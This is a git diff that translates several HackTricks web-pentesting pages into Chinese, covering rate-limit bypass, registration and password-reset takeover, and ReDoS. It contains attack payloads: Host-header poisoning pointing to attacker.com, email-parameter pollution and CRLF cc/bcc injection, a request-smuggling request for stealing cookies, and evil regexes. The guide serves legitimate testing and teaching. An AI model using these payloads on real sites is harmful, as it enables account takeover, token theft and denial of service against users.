+建议更改其他请求头，例如用户代理和 cookies，因为这些也可以用于识别和跟踪请求模式。更改这些头部可以防止识别和跟踪请求者的活动。
 
-Altering other request headers such as the user-agent and cookies is recommended, as these can also be used to identify and track request patterns. Changing these headers can prevent recognition and tracking of the requester's activities.
+### 利用 API 网关行为
 
-### Leveraging API Gateway Behavior
+某些 API 网关被配置为根据端点和参数的组合应用速率限制。通过改变参数值或向请求中添加不重要的参数，可以绕过网关的速率限制逻辑，使每个请求看起来都是唯一的。例如 `/resetpwd?someparam=1`。
 
-Some API gateways are configured to apply rate limiting based on the combination of endpoint and parameters. By varying the parameter values or adding non-significant parameters to the request, it's possible to circumvent the gateway's rate-limiting logic, making each request appear unique. For exmple `/resetpwd?someparam=1`.
+### 在每次尝试之前登录到您的帐户
 
-### Logging into Your Account Before Each Attempt
+在每次尝试或每组尝试之前登录到帐户，可能会重置速率限制计数器。这在测试登录功能时尤其有用。利用像 Burp Suite 这样的工具中的 Pitchfork 攻击，在每几次尝试中轮换凭据，并确保标记跟随重定向，可以有效地重启速率限制计数器。
 
-Logging into an account before each attempt, or every set of attempts, might reset the rate limit counter. This is especially useful when testing login functionalities. Utilizing a Pitchfork attack in tools like Burp Suite, to rotate credentials every few attempts and ensuring follow redirects are marked, can effectively restart rate limit counters.
+### 利用代理网络
 
-### Utilizing Proxy Networks
+部署一个代理网络，将请求分散到多个 IP 地址，可以有效绕过基于 IP 的速率限制。通过通过各种代理路由流量，每个请求看起来都来自不同的来源，从而稀释速率限制的有效性。
 
-Deploying a network of proxies to distribute the requests across multiple IP addresses can effectively bypass IP-based rate limits. By routing traffic through various proxies, each request appears to originate from a different source, diluting the rate limit's effectiveness.
+### 在不同帐户或会话之间分散攻击
 
-### Splitting the Attack Across Different Accounts or Sessions
+如果目标系统在每个帐户或每个会话的基础上应用速率限制，将攻击或测试分散到多个帐户或会话可以帮助避免检测。这种方法需要管理多个身份或会话令牌，但可以有效地分散负载，以保持在允许的限制内。
 
-If the target system applies rate limits on a per-account or per-session basis, distributing the attack or test across multiple accounts or sessions can help in avoiding detection. This approach requires managing multiple identities or session tokens, but can effectively distribute the load to stay within allowable limits.
+### 继续尝试
 
-### Keep Trying
-
-Note that even if a rate limit is in place you should try to see if the response is different when the valid OTP is sent. In [**this post**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732), the bug hunter discovered that even if a rate limit is triggered after 20 unsuccessful attempts by responding with 401, if the valid one was sent a 200 response was received.
+请注意，即使存在速率限制，您也应该尝试查看在发送有效 OTP 时响应是否不同。在 [**这篇文章**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732) 中，漏洞猎人发现，即使在 20 次不成功的尝试后触发了速率限制并以 401 响应，如果发送了有效的 OTP，则会收到 200 响应。
 
 {{#include ../banners/hacktricks-training.md}}
 
 <figure><img src="../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}
-
diff --git a/src/pentesting-web/registration-vulnerabilities.md b/src/pentesting-web/registration-vulnerabilities.md
index dffca5f0f..d501b569f 100644
--- a/src/pentesting-web/registration-vulnerabilities.md
+++ b/src/pentesting-web/registration-vulnerabilities.md
@@ -1,78 +1,77 @@
-# Registration & Takeover Vulnerabilities
+# 注册与接管漏洞
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Registration Takeover
+## 注册接管
 
-### Duplicate Registration
+### 重复注册
 
-- Try to generate using an existing username
-- Check varying the email:
-  - uppsercase
-  - \+1@
-  - add some dot in the email
-  - special characters in the email name (%00, %09, %20)
-  - Put black characters after the email: `test@test.com a`
-  - victim@gmail.com@attacker.com
-  - victim@attacker.com@gmail.com
+- 尝试使用现有用户名生成
+- 检查不同的电子邮件：
+- 大写字母
+- \+1@
+- 在电子邮件中添加一些点
+- 电子邮件名称中的特殊字符 (%00, %09, %20)
+- 在电子邮件后放置黑色字符：`test@test.com a`
+- victim@gmail.com@attacker.com
+- victim@attacker.com@gmail.com
 
-### Username Enumeration
+### 用户名枚举
 
-Check if you can figure out when a username has already been registered inside the application.
+检查您是否可以确定用户名是否已在应用程序中注册。
 
-### Password Policy
+### 密码策略
 
-Creating a user check the password policy (check if you can use weak passwords).\
-In that case you may try to bruteforce credentials.
+创建用户时检查密码策略（检查是否可以使用弱密码）。\
+在这种情况下，您可以尝试暴力破解凭据。
 
-### SQL Injection
+### SQL 注入
 
-[**Check this page** ](sql-injection/#insert-statement)to learn how to attempt account takeovers or extract information via **SQL Injections** in registry forms.
+[**查看此页面**](sql-injection/#insert-statement)以了解如何尝试账户接管或通过**SQL 注入**在注册表单中提取信息。
 
-### Oauth Takeovers
+### Oauth 接管
 
 {{#ref}}
 oauth-to-account-takeover.md
 {{#endref}}
 
-### SAML Vulnerabilities
+### SAML 漏洞
 
 {{#ref}}
 saml-attacks/
 {{#endref}}
 
-### Change Email
+### 更改电子邮件
 
-When registered try to change the email and check if this change is correctly validated or can change it to arbitrary emails.
+注册后尝试更改电子邮件，并检查此更改是否正确验证或是否可以更改为任意电子邮件。
 
-### More Checks
+### 更多检查
 
-- Check if you can use **disposable emails**
-- **Long** **password** (>200) leads to **DoS**
-- **Check rate limits on account creation**
-- Use username@**burp_collab**.net and analyze the **callback**
+- 检查是否可以使用**一次性电子邮件**
+- **长** **密码** (>200) 导致 **DoS**
+- **检查账户创建的速率限制**
+- 使用 username@**burp_collab**.net 并分析 **回调**
 
-## **Password Reset Takeover**
+## **密码重置接管**
 
-### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
+### 通过引荐者泄露密码重置令牌 <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
 
-1. Request password reset to your email address
-2. Click on the password reset link
-3. Don’t change password
-4. Click any 3rd party websites(eg: Facebook, twitter)
-5. Intercept the request in Burp Suite proxy
-6. Check if the referer header is leaking password reset token.
+1. 请求将密码重置到您的电子邮件地址
+2. 点击密码重置链接
+3. 不要更改密码
+4. 点击任何第三方网站（例如：Facebook，Twitter）
+5. 在 Burp Suite 代理中拦截请求
+6. 检查 referer 头是否泄露密码重置令牌。
 
-### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
+### 密码重置中毒 <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
 
-1. Intercept the password reset request in Burp Suite
-2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
-3. Forward the request with the modified header\
-   `http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
-4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`
-
-### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
+1. 在 Burp Suite 中拦截密码重置请求
+2. 在 Burp Suite 中添加或编辑以下头部：`Host: attacker.com`，`X-Forwarded-Host: attacker.com`
+3. 转发带有修改头部的请求\
+`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
+4. 查找基于 _host 头_ 的密码重置 URL，例如：`https://attacker.com/reset-password.php?token=TOKEN`
 
+### 通过电子邮件参数重置密码 <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
 ```powershell
 # parameter pollution
 email=victim@mail.com&email=hacker@mail.com
@@ -89,60 +88,58 @@ email=victim@mail.com,hacker@mail.com
 email=victim@mail.com%20hacker@mail.com
 email=victim@mail.com|hacker@mail.com
 ```
-
 ### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
 
-1. Attacker have to login with their account and go to the **Change password** feature.
-2. Start the Burp Suite and Intercept the request
-3. Send it to the repeater tab and edit the parameters : User ID/email\
-   `powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
+1. 攻击者必须使用他们的账户登录并进入**更改密码**功能。
+2. 启动Burp Suite并拦截请求
+3. 将其发送到重复器选项卡并编辑参数：用户ID/电子邮件\
+`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
 
 ### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
 
-The password reset token should be randomly generated and unique every time.\
-Try to determine if the token expire or if it’s always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
+密码重置令牌应该是随机生成的，并且每次都是唯一的。\
+尝试确定令牌是否过期或是否总是相同，在某些情况下，生成算法较弱，可以被猜测。以下变量可能被算法使用。
 
-- Timestamp
-- UserID
-- Email of User
-- Firstname and Lastname
-- Date of Birth
-- Cryptography
-- Number only
-- Small token sequence ( characters between \[A-Z,a-z,0-9])
-- Token reuse
-- Token expiration date
+- 时间戳
+- 用户ID
+- 用户电子邮件
+- 名字和姓氏
+- 出生日期
+- 加密
+- 仅数字
+- 小令牌序列（字符在\[A-Z,a-z,0-9]之间）
+- 令牌重用
+- 令牌过期日期
 
 ### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
 
-1. Trigger a password reset request using the API/UI for a specific email e.g: test@mail.com
-2. Inspect the server response and check for `resetToken`
-3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
+1. 使用API/UI触发特定电子邮件的密码重置请求，例如：test@mail.com
+2. 检查服务器响应并查看`resetToken`
+3. 然后在URL中使用令牌，例如`https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
 
 ### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
 
-1. Register on the system with a username identical to the victim’s username, but with white spaces inserted before and/or after the username. e.g: `"admin "`
-2. Request a password reset with your malicious username.
-3. Use the token sent to your email and reset the victim password.
-4. Connect to the victim account with the new password.
+1. 使用与受害者用户名相同的用户名在系统中注册，但在用户名前后插入空格。例如：`"admin "`
+2. 使用您的恶意用户名请求密码重置。
+3. 使用发送到您电子邮件的令牌重置受害者密码。
+4. 使用新密码连接到受害者账户。
 
-The platform CTFd was vulnerable to this attack.\
-See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
+平台CTFd对该攻击存在漏洞。\
+见：[CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
 
 ### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
 
-1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
-2. Leak the current **sessions cookie**
-3. Authenticate as the user using the cookie
+1. 在应用程序或子域中找到XSS，如果cookies的作用域是父域：`*.domain.com`
+2. 泄露当前**会话cookie**
+3. 使用cookie作为用户进行身份验证
 
 ### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
 
-1\. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)\
+1\. 使用**smuggler**检测HTTP请求走私的类型（CL, TE, CL.TE）\
 `powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
-2\. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:\
-`GET http://something.burpcollaborator.net HTTP/1.1 X:` with the goal of open redirect the victims to burpcollab and steal their cookies\
-3\. Final request could look like the following
-
+2\. 构造一个请求，该请求将用以下数据覆盖`POST / HTTP/1.1`：\
+`GET http://something.burpcollaborator.net HTTP/1.1 X:`，目的是将受害者重定向到burpcollab并窃取他们的cookies\
+3\. 最终请求可能看起来像以下内容
 ```
 GET / HTTP/1.1
 Transfer-Encoding: chunked
@@ -154,30 +151,28 @@ Content-Length: 83
 GET http://something.burpcollaborator.net  HTTP/1.1
 X: X
 ```
-
-Hackerone reports exploiting this bug\
+Hackerone 报告利用此漏洞\
 \* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
 \* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
 
-### Account Takeover via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
+### 通过 CSRF 实现账户接管 <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
 
-1. Create a payload for the CSRF, e.g: “HTML form with auto submit for a password change”
-2. Send the payload
+1. 创建 CSRF 的有效载荷，例如：“用于密码更改的自动提交 HTML 表单”
+2. 发送有效载荷
 
-### Account Takeover via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
+### 通过 JWT 实现账户接管 <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
 
-JSON Web Token might be used to authenticate an user.
+JSON Web Token 可能用于验证用户。
 
-- Edit the JWT with another User ID / Email
-- Check for weak JWT signature
+- 使用另一个用户 ID / 电子邮件编辑 JWT
+- 检查 JWT 签名是否弱
 
 {{#ref}}
 hacking-jwt-json-web-tokens.md
 {{#endref}}
 
-## References
+## 参考
 
 - [https://salmonsec.com/cheatsheet/account_takeover](https://salmonsec.com/cheatsheet/account_takeover)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/regular-expression-denial-of-service-redos.md b/src/pentesting-web/regular-expression-denial-of-service-redos.md
index 343243075..095c67c44 100644
--- a/src/pentesting-web/regular-expression-denial-of-service-redos.md
+++ b/src/pentesting-web/regular-expression-denial-of-service-redos.md
@@ -1,18 +1,18 @@
-# Regular expression Denial of Service - ReDoS
+# 正则表达式拒绝服务 - ReDoS
 
 {{#include ../banners/hacktricks-training.md}}
 
-# Regular Expression Denial of Service (ReDoS)
+# 正则表达式拒绝服务 (ReDoS)
 
-A **Regular Expression Denial of Service (ReDoS)** happens when someone takes advantage of weaknesses in how regular expressions (a way to search and match patterns in text) work. Sometimes, when regular expressions are used, they can become very slow, especially if the piece of text they're working with gets larger. This slowness can get so bad that it grows really fast with even small increases in the text size. Attackers can use this problem to make a program that uses regular expressions stop working properly for a long time.
+**正则表达式拒绝服务 (ReDoS)** 是指有人利用正则表达式（用于搜索和匹配文本模式的一种方式）工作中的弱点。有时，当使用正则表达式时，它们可能会变得非常慢，尤其是当它们处理的文本变得更大时。这种缓慢可能会变得非常严重，甚至在文本大小稍微增加时也会迅速增长。攻击者可以利用这个问题使使用正则表达式的程序长时间无法正常工作。
 
-## The Problematic Regex Naïve Algorithm
+## 有问题的正则表达式天真算法
 
-**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
+**查看详细信息 [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
 
-## Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a>
+## 恶意正则表达式 <a href="#evil-regexes" id="evil-regexes"></a>
 
-An evil regular expression pattern is that one that can **get stuck on crafted input causing a DoS**. Evil regex patterns typically contain grouping with repetition and repetition or alternation with overlapping inside the repeated group. Some examples of evil patterns include:
+恶意正则表达式模式是指那些**在特制输入上卡住导致拒绝服务**的模式。恶意正则表达式模式通常包含重复的分组和重复或交替的重叠在重复组内。一些恶意模式的示例包括：
 
 - (a+)+
 - ([a-zA-Z]+)\*
@@ -20,41 +20,40 @@ An evil regular expression pattern is that one that can **get stuck on crafted i
 - (a|a?)+
 - (.\*a){x} for x > 10
 
-All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
+所有这些都对输入 `aaaaaaaaaaaaaaaaaaaaaaaa!` 易受攻击。
 
-## ReDoS Payloads
+## ReDoS 有效载荷
 
-### String Exfiltration via ReDoS
+### 通过 ReDoS 字符串外泄
 
-In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (the flag) is matched with**. Then, if might be useful to make the **page freeze (timeout or longer processing time)** if the a **Regex matched** and **not if it didn't**. This way you will be able to **exfiltrate** the string **char by char**:
+在 CTF（或漏洞赏金）中，也许你**控制了与敏感信息（标志）匹配的正则表达式**。然后，如果**正则表达式匹配**，使**页面冻结（超时或更长处理时间）**可能会很有用，而**如果没有匹配则不冻结**。这样你就可以**逐字符外泄**字符串：
 
-- In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$`
-  - Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
-- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!`
-- In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
+- 在 [**这篇文章**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) 中你可以找到这个 ReDoS 规则：`^(?=<flag>)((.*)*)*salt$`
+- 示例：`^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
+- 在 [**这篇写作**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) 中你可以找到这个：`<flag>(((((((.*)*)*)*)*)*)*)!`
+- 在 [**这篇写作**](https://ctftime.org/writeup/25869) 中他使用了：`^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
 
-### ReDoS Controlling Input and Regex
-
-The following are **ReDoS** examples where you **control** both the **input** and the **regex**:
+### ReDoS 控制输入和正则表达式
 
+以下是**ReDoS**示例，其中你**控制**输入和**正则表达式**：
 ```javascript
 function check_time_regexp(regexp, text) {
-  var t0 = new Date().getTime()
-  new RegExp(regexp).test(text)
-  var t1 = new Date().getTime()
-  console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
+var t0 = new Date().getTime()
+new RegExp(regexp).test(text)
+var t1 = new Date().getTime()
+console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
 }
 
 // This payloads work because the input has several "a"s
 ;[
-  //  "((a+)+)+$",  //Eternal,
-  //  "(a?){100}$", //Eternal
-  "(a|a?)+$",
-  "(\\w*)+$", //Generic
-  "(a*)+$",
-  "(.*a){100}$",
-  "([a-zA-Z]+)*$", //Generic
-  "(a+)*$",
+//  "((a+)+)+$",  //Eternal,
+//  "(a?){100}$", //Eternal
+"(a|a?)+$",
+"(\\w*)+$", //Generic
+"(a*)+$",
+"(.*a){100}$",
+"([a-zA-Z]+)*$", //Generic
+"(a+)*$",
 ].forEach((regexp) => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))
 
 /*
@@ -66,13 +65,12 @@ Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
 Regexp (a+)*$ took 723 milliseconds.
 */
 ```
-
-## Tools
+## 工具
 
 - [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
 - [https://devina.io/redos-checker](https://devina.io/redos-checker)
 
-## References
+## 参考
 
 - [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
 - [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
@@ -80,4 +78,3 @@ Regexp (a+)*$ took 723 milliseconds.
 - [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md
index 984bdb012..d71a99a26 100644
--- a/src/pentesting-web/reset-password.md
+++ b/src/pentesting-web/reset-password.md
@@ -1,220 +1,203 @@
-# Reset/Forgotten Password Bypass
+# 重置/忘记密码绕过
 
 {{#include ../banners/hacktricks-training.md}}
 
 <figure><img src="../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客见解**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+了解最新的漏洞赏金发布和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶级黑客合作！
 
-## **Password Reset Token Leak Via Referrer**
+## **通过引荐人泄露密码重置令牌**
 
-- The HTTP referer header may leak the password reset token if it's included in the URL. This can occur when a user clicks on a third-party website link after requesting a password reset.
-- **Impact**: Potential account takeover via Cross-Site Request Forgery (CSRF) attacks.
-- **Exploitation**: To check if a password reset token is leaking in the referer header, **request a password reset** to your email address and **click the reset link** provided. **Do not change your password** immediately. Instead, **navigate to a third-party website** (like Facebook or Twitter) while **intercepting the requests using Burp Suite**. Inspect the requests to see if the **referer header contains the password reset token**, as this could expose sensitive information to third parties.
-- **References**:
-  - [HackerOne Report 342693](https://hackerone.com/reports/342693)
-  - [HackerOne Report 272379](https://hackerone.com/reports/272379)
-  - [Password Reset Token Leak Article](https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a)
+- 如果密码重置令牌包含在URL中，HTTP referer头可能会泄露该令牌。这可能发生在用户请求密码重置后点击第三方网站链接时。
+- **影响**：通过跨站请求伪造（CSRF）攻击可能导致账户接管。
+- **利用**：要检查密码重置令牌是否在referer头中泄露，**请求密码重置**到您的电子邮件地址，并**点击提供的重置链接**。**不要立即更改您的密码**。相反，**在使用Burp Suite拦截请求时，导航到第三方网站**（如Facebook或Twitter）。检查请求以查看**referer头是否包含密码重置令牌**，因为这可能会将敏感信息暴露给第三方。
+- **参考**：
+- [HackerOne报告342693](https://hackerone.com/reports/342693)
+- [HackerOne报告272379](https://hackerone.com/reports/272379)
+- [密码重置令牌泄露文章](https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a)
 
-## **Password Reset Poisoning**
+## **密码重置中毒**
 
-- Attackers may manipulate the Host header during password reset requests to point the reset link to a malicious site.
-- **Impact**: Leads to potential account takeover by leaking reset tokens to attackers.
-- **Mitigation Steps**:
-  - Validate the Host header against a whitelist of allowed domains.
-  - Use secure, server-side methods to generate absolute URLs.
-  - **Patch**: Use `$_SERVER['SERVER_NAME']` to construct password reset URLs instead of `$_SERVER['HTTP_HOST']`.
-- **References**:
-  - [Acunetix Article on Password Reset Poisoning](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
+- 攻击者可能在密码重置请求中操纵Host头，将重置链接指向恶意网站。
+- **影响**：通过将重置令牌泄露给攻击者，可能导致账户接管。
+- **缓解步骤**：
+- 验证Host头是否在允许的域名白名单中。
+- 使用安全的服务器端方法生成绝对URL。
+- **补丁**：使用 `$_SERVER['SERVER_NAME']` 构造密码重置URL，而不是 `$_SERVER['HTTP_HOST']`。
+- **参考**：
+- [关于密码重置中毒的Acunetix文章](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
 
-## **Password Reset By Manipulating Email Parameter**
+## **通过操纵电子邮件参数重置密码**
 
-Attackers can manipulate the password reset request by adding additional email parameters to divert the reset link.
-
-- Add attacker email as second parameter using &
+攻击者可以通过添加额外的电子邮件参数来操纵密码重置请求，以转移重置链接。
 
+- 使用 & 添加攻击者电子邮件作为第二个参数
 ```php
 POST /resetPassword
 [...]
 email=victim@email.com&email=attacker@email.com
 ```
-
-- Add attacker email as second parameter using %20
-
+- 使用 %20 将攻击者电子邮件作为第二个参数添加
 ```php
 POST /resetPassword
 [...]
 email=victim@email.com%20email=attacker@email.com
 ```
-
-- Add attacker email as second parameter using |
-
+- 使用 | 将攻击者电子邮件作为第二个参数添加
 ```php
 POST /resetPassword
 [...]
 email=victim@email.com|email=attacker@email.com
 ```
-
-- Add attacker email as second parameter using cc
-
+- 使用抄送将攻击者电子邮件作为第二个参数添加
 ```php
 POST /resetPassword
 [...]
 email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
 ```
-
-- Add attacker email as second parameter using bcc
-
+- 使用bcc将攻击者电子邮件作为第二个参数添加
 ```php
 POST /resetPassword
 [...]
 email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
 ```
-
-- Add attacker email as second parameter using ,
-
+- 使用 , 将攻击者电子邮件作为第二个参数添加。
 ```php
 POST /resetPassword
 [...]
 email="victim@mail.tld",email="attacker@mail.tld"
 ```
-
-- Add attacker email as second parameter in json array
-
+- 将攻击者电子邮件作为 JSON 数组中的第二个参数添加
 ```php
 POST /resetPassword
 [...]
 {"email":["victim@mail.tld","atracker@mail.tld"]}
 ```
+- **缓解步骤**：
+- 服务器端正确解析和验证电子邮件参数。
+- 使用预处理语句或参数化查询以防止注入攻击。
+- **参考文献**：
+- [https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be](https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be)
+- [https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/](https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/)
+- [https://twitter.com/HusseiN98D/status/1254888748216655872](https://twitter.com/HusseiN98D/status/1254888748216655872)
 
-- **Mitigation Steps**:
-  - Properly parse and validate email parameters server-side.
-  - Use prepared statements or parameterized queries to prevent injection attacks.
-- **References**:
-  - [https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be](https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be)
-  - [https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/](https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/)
-  - [https://twitter.com/HusseiN98D/status/1254888748216655872](https://twitter.com/HusseiN98D/status/1254888748216655872)
-
-## **Changing Email And Password of any User through API Parameters**
-
-- Attackers can modify email and password parameters in API requests to change account credentials.
+## **通过API参数更改任何用户的电子邮件和密码**
 
+- 攻击者可以在API请求中修改电子邮件和密码参数以更改账户凭据。
 ```php
 POST /api/changepass
 [...]
 ("form": {"email":"victim@email.tld","password":"12345678"})
 ```
+- **缓解步骤**：
+- 确保严格的参数验证和身份验证检查。
+- 实施强大的日志记录和监控，以检测和响应可疑活动。
+- **参考**：
+- [通过API参数操纵进行完整账户接管](https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240)
 
-- **Mitigation Steps**:
-  - Ensure strict parameter validation and authentication checks.
-  - Implement robust logging and monitoring to detect and respond to suspicious activities.
-- **Reference**:
-  - [Full Account Takeover via API Parameter Manipulation](https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240)
+## **无速率限制：电子邮件轰炸**
 
-## **No Rate Limiting: Email Bombing**
+- 密码重置请求缺乏速率限制可能导致电子邮件轰炸，使用户被重置电子邮件淹没。
+- **缓解步骤**：
+- 基于IP地址或用户账户实施速率限制。
+- 使用CAPTCHA挑战以防止自动滥用。
+- **参考**：
+- [HackerOne报告280534](https://hackerone.com/reports/280534)
 
-- Lack of rate limiting on password reset requests can lead to email bombing, overwhelming the user with reset emails.
-- **Mitigation Steps**:
-  - Implement rate limiting based on IP address or user account.
-  - Use CAPTCHA challenges to prevent automated abuse.
-- **References**:
-  - [HackerOne Report 280534](https://hackerone.com/reports/280534)
+## **找出密码重置令牌的生成方式**
 
-## **Find out How Password Reset Token is Generated**
+- 理解令牌生成背后的模式或方法可能导致预测或暴力破解令牌。一些选项：
+- 基于时间戳
+- 基于用户ID
+- 基于用户的电子邮件
+- 基于名字和姓氏
+- 基于出生日期
+- 基于加密
+- **缓解步骤**：
+- 使用强大的加密方法生成令牌。
+- 确保足够的随机性和长度以防止可预测性。
+- **工具**：使用Burp Sequencer分析令牌的随机性。
 
-- Understanding the pattern or method behind token generation can lead to predicting or brute-forcing tokens. Some options:
-  - Based Timestamp
-  - Based on the UserID
-  - Based on email of User
-  - Based on Firstname and Lastname
-  - Based on Date of Birth
-  - Based on Cryptography
-- **Mitigation Steps**:
